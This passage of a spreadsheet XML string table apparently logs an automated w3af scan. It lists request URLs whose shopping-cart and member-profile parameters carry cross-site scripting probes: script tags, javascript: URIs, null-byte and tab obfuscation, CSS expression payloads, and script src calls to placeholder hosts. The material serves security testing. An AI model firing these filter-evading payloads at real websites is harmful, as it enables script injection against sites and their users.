    <t>/antoanweb/publico/anadir.jsp?nombre=&lt;script&gt;a=/vohu/fake_alert(a.source)&lt;/script&gt;&amp;precio=100&amp;id=1&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=&lt;script&gt;fake_alert(string.fromcharcode(vohu))&lt;/script&gt;&amp;precio=100&amp;id=1&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=&lt;script/xss+src=http://vohu/x.js&gt;&lt;/script&gt;&amp;precio=100&amp;id=1&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=&lt;script+src=http://vohu/x.js&gt;&lt;/script&gt;&amp;precio=100&amp;id=1&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=&lt;script/src=http://vohu/x.js&gt;&lt;/script&gt;&amp;precio=100&amp;id=1&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre='';!--"&lt;vohu&gt;=&amp;{()}&amp;precio=100&amp;id=1&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=&lt;_x0000_script&gt;fake_alert("vohu")&lt;/script&gt;&amp;precio=100&amp;id=1&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=jamã³n+ibã©rico&amp;precio=4d1gg&lt;ttsz&gt;ttsz"ttsz'ttsz(ttsz)4d1gg&amp;id=1&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=jamã³n+ibã©rico&amp;precio=&lt;script&gt;alert("f2s2")&lt;/script&gt;&amp;id=1&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=jamã³n+ibã©rico&amp;precio=javascript:alert("f2s2");&amp;id=1&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=jamã³n+ibã©rico&amp;precio=&lt;_x0000_script&gt;alert("f2s2")&lt;/script&gt;&amp;id=1&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=jamã³n+ibã©rico&amp;precio=&lt;/a/style="xss:exp/**/ression(alert('xss'))"&gt;&amp;id=1&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=jamã³n+ibã©rico&amp;precio=&lt;scr_x0000_ipt&gt;alert("f2s2")&lt;/sc_x0000_ript&gt;&amp;id=1&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=jamã³n+ibã©rico&amp;precio=&lt;script+src=http://f2s2/x.js&gt;&lt;/script&gt;&amp;id=1&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=jamã³n+ibã©rico&amp;precio=&lt;script&gt;a=/f2s2/alert(a.source)&lt;/script&gt;&amp;id=1&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=jamã³n+ibã©rico&amp;precio=javas&amp;#x09;cript:alert("f2s2");&amp;id=1&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=jamã³n+ibã©rico&amp;precio=javas_x0000_cript:alert("f2s2");&amp;id=1&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=jamã³n+ibã©rico&amp;precio=javas	cript:alert("f2s2");&amp;id=1&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=jamã³n+ibã©rico&amp;precio=&lt;script&gt;alert(string.fromcharcode(f2s2))&lt;/script&gt;&amp;id=1&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=jamã³n+ibã©rico&amp;precio=&lt;script/xss+src=http://f2s2/x.js&gt;&lt;/script&gt;&amp;id=1&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=jamã³n+ibã©rico&amp;precio='';!--"&lt;f2s2&gt;=&amp;{()}&amp;id=1&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=jamã³n+ibã©rico&amp;precio=&lt;script&gt;fake_alert(string.fromcharcode(mrdq))&lt;/script&gt;&amp;id=1&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=jamã³n+ibã©rico&amp;precio=&lt;script+src=http://mrdq/x.js&gt;&lt;/script&gt;&amp;id=1&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=jamã³n+ibã©rico&amp;precio=&lt;_x0000_script&gt;fake_alert("mrdq")&lt;/script&gt;&amp;id=1&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=jamã³n+ibã©rico&amp;precio=&lt;script&gt;a=/mrdq/fake_alert(a.source)&lt;/script&gt;&amp;id=1&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=jamã³n+ibã©rico&amp;precio=&lt;script&gt;fake_alert("mrdq")&lt;/script&gt;&amp;id=1&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=jamã³n+ibã©rico&amp;precio='';!--"&lt;mrdq&gt;=&amp;{()}&amp;id=1&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=jamã³n+ibã©rico&amp;precio=100&amp;id=6mdov&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=jamã³n+ibã©rico&amp;precio=100&amp;id=i85eh&lt;eclo&gt;eclo"eclo'eclo(eclo)i85eh&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=jamã³n+ibã©rico&amp;precio=100&amp;id=&lt;script&gt;alert(string.fromcharcode(amj8))&lt;/script&gt;&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=jamã³n+ibã©rico&amp;precio=100&amp;id=&lt;script&gt;alert("amj8")&lt;/script&gt;&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=jamã³n+ibã©rico&amp;precio=100&amp;id=&lt;script&gt;a=/amj8/alert(a.source)&lt;/script&gt;&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=jamã³n+ibã©rico&amp;precio=100&amp;id=javas&amp;#x09;cript:alert("amj8");&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=jamã³n+ibã©rico&amp;precio=100&amp;id=javascript:alert("amj8");&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=jamã³n+ibã©rico&amp;precio=100&amp;id='';!--"&lt;amj8&gt;=&amp;{()}&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=jamã³n+ibã©rico&amp;precio=100&amp;id=&lt;script+src=http://amj8/x.js&gt;&lt;/script&gt;&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=jamã³n+ibã©rico&amp;precio=100&amp;id=&lt;/a/style="xss:exp/**/ression(alert('xss'))"&gt;&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=jamã³n+ibã©rico&amp;precio=100&amp;id=&lt;iframe+src="javascript:alert('amj8');"&gt;&lt;/iframe&gt;&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=jamã³n+ibã©rico&amp;precio=100&amp;id=javas_x0000_cript:alert("amj8");&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=jamã³n+ibã©rico&amp;precio=100&amp;id=javas	cript:alert("amj8");&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=jamã³n+ibã©rico&amp;precio=100&amp;id=&lt;script&gt;a=/8m6c/fake_alert(a.source)&lt;/script&gt;&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=jamã³n+ibã©rico&amp;precio=100&amp;id=&lt;script&gt;fake_alert(string.fromcharcode(8m6c))&lt;/script&gt;&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=jamã³n+ibã©rico&amp;precio=100&amp;id='';!--"&lt;8m6c&gt;=&amp;{()}&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=jamã³n+ibã©rico&amp;precio=100&amp;id=&lt;script&gt;fake_alert("8m6c")&lt;/script&gt;&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=jamã³n+ibã©rico&amp;precio=100&amp;id=1&amp;cantidad=grrq9</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=jamã³n+ibã©rico&amp;precio=100&amp;id=1&amp;cantidad=3dbwz&lt;rfi5&gt;rfi5"rfi5'rfi5(rfi5)3dbwz</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=jamã³n+ibã©rico&amp;precio=100&amp;id=1&amp;cantidad=&lt;script&gt;alert("ugnw")&lt;/script&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=jamã³n+ibã©rico&amp;precio=100&amp;id=1&amp;cantidad=&lt;scr_x0000_ipt&gt;alert("ugnw")&lt;/sc_x0000_ript&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=jamã³n+ibã©rico&amp;precio=100&amp;id=1&amp;cantidad=&lt;iframe+src="javascript:alert('ugnw');"&gt;&lt;/iframe&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=jamã³n+ibã©rico&amp;precio=100&amp;id=1&amp;cantidad=&lt;script&gt;a=/ugnw/alert(a.source)&lt;/script&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=jamã³n+ibã©rico&amp;precio=100&amp;id=1&amp;cantidad=javas_x0000_cript:alert("ugnw");</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=jamã³n+ibã©rico&amp;precio=100&amp;id=1&amp;cantidad=&lt;script+src=http://ugnw/x.js&gt;&lt;/script&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=jamã³n+ibã©rico&amp;precio=100&amp;id=1&amp;cantidad=&lt;script&gt;fake_alert(string.fromcharcode(iiwz))&lt;/script&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=jamã³n+ibã©rico&amp;precio=100&amp;id=1&amp;cantidad='';!--"&lt;iiwz&gt;=&amp;{()}</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=jamã³n+ibã©rico&amp;precio=100&amp;id=1&amp;cantidad=&lt;script&gt;fake_alert("iiwz")&lt;/script&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=jamã³n+ibã©rico&amp;precio=100&amp;id=1&amp;cantidad=&lt;script&gt;a=/iiwz/fake_alert(a.source)&lt;/script&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=jamã³n+ibã©rico&amp;precio=100&amp;id=1&amp;cantidad=&lt;script+src=http://iiwz/x.js&gt;&lt;/script&gt;</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=&lt;script+src=http://ddtj/x.js&gt;&lt;/script&gt;&amp;provincia=50&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=&lt;script/xss+src=http://ddtj/x.js&gt;&lt;/script&gt;&amp;provincia=50&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password='';!--"&lt;ddtj&gt;=&amp;{()}&amp;provincia=50&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=&lt;script&gt;fake_alert("ddtj")&lt;/script&gt;&amp;provincia=50&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=&lt;script/src=http://ddtj/x.js&gt;&lt;/script&gt;&amp;provincia=50&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=&lt;_x0000_script&gt;fake_alert("ddtj")&lt;/script&gt;&amp;provincia=50&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=&lt;script&gt;fake_alert(string.fromcharcode(ddtj))&lt;/script&gt;&amp;provincia=50&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=rq6km&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=2h5mt&lt;3e3o&gt;3e3o"3e3o'3e3o(3e3o)2h5mt&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=&lt;script&gt;a=/omwq/alert(a.source)&lt;/script&gt;&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=&lt;script+src=http://omwq/x.js&gt;&lt;/script&gt;&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=&lt;script/src=http://omwq/x.js&gt;&lt;/script&gt;&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=&lt;scr_x0000_ipt&gt;alert("omwq")&lt;/sc_x0000_ript&gt;&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia='';!--"&lt;m0aa&gt;=&amp;{()}&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=&lt;script&gt;fake_alert("m0aa")&lt;/script&gt;&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=&lt;_x0000_script&gt;fake_alert("m0aa")&lt;/script&gt;&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=&lt;script+src=http://m0aa/x.js&gt;&lt;/script&gt;&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=&lt;script&gt;a=/m0aa/fake_alert(a.source)&lt;/script&gt;&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=&lt;script/src=http://m0aa/x.js&gt;&lt;/script&gt;&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=&lt;script/xss+src=http://m0aa/x.js&gt;&lt;/script&gt;&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=&lt;script&gt;fake_alert(string.fromcharcode(m0aa))&lt;/script&gt;&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=tq4f5&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=50&amp;login=56&amp;dni=&lt;script&gt;fake_alert(string.fromcharcode(sm2s))&lt;/script&gt;&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=50&amp;login=56&amp;dni='';!--"&lt;sm2s&gt;=&amp;{()}&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=50&amp;login=56&amp;dni=&lt;script/xss+src=http://sm2s/x.js&gt;&lt;/script&gt;&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=50&amp;login=56&amp;dni=&lt;script&gt;fake_alert("sm2s")&lt;/script&gt;&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=50&amp;login=56&amp;dni=&lt;script+src=http://sm2s/x.js&gt;&lt;/script&gt;&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=50&amp;login=56&amp;dni=&lt;script&gt;a=/sm2s/fake_alert(a.source)&lt;/script&gt;&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=50&amp;login=56&amp;dni=&lt;script/src=http://sm2s/x.js&gt;&lt;/script&gt;&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=cg55g&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=50&amp;login=56&amp;dni=56&amp;direccion=&lt;script/src=http://hho2/x.js&gt;&lt;/script&gt;&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=50&amp;login=56&amp;dni=56&amp;direccion=&lt;script/xss+src=http://hho2/x.js&gt;&lt;/script&gt;&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=50&amp;login=56&amp;dni=56&amp;direccion='';!--"&lt;hho2&gt;=&amp;{()}&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=50&amp;login=56&amp;dni=56&amp;direccion=&lt;script&gt;fake_alert("hho2")&lt;/script&gt;&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=50&amp;login=56&amp;dni=56&amp;direccion=&lt;script&gt;a=/hho2/fake_alert(a.source)&lt;/script&gt;&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=50&amp;login=56&amp;dni=56&amp;direccion=&lt;script+src=http://hho2/x.js&gt;&lt;/script&gt;&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=50&amp;login=56&amp;dni=56&amp;direccion=&lt;script&gt;fake_alert(string.fromcharcode(hho2))&lt;/script&gt;&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=xidzj&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=50&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=&lt;script&gt;a=/bfkl/fake_alert(a.source)&lt;/script&gt;&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=50&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos='';!--"&lt;bfkl&gt;=&amp;{()}&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=50&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=&lt;script+src=http://bfkl/x.js&gt;&lt;/script&gt;&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=50&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=&lt;script/xss+src=http://bfkl/x.js&gt;&lt;/script&gt;&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=50&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=&lt;_x0000_script&gt;fake_alert("bfkl")&lt;/script&gt;&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=50&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=&lt;script/src=http://bfkl/x.js&gt;&lt;/script&gt;&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=50&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=&lt;script&gt;fake_alert(string.fromcharcode(bfkl))&lt;/script&gt;&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=itlq2&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=50&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email='';!--"&lt;jgdi&gt;=&amp;{()}&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=50&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=&lt;script&gt;fake_alert("jgdi")&lt;/script&gt;&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=50&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=&lt;_x0000_script&gt;fake_alert("jgdi")&lt;/script&gt;&amp;modo=insertar</t>
  </si>
  <si>
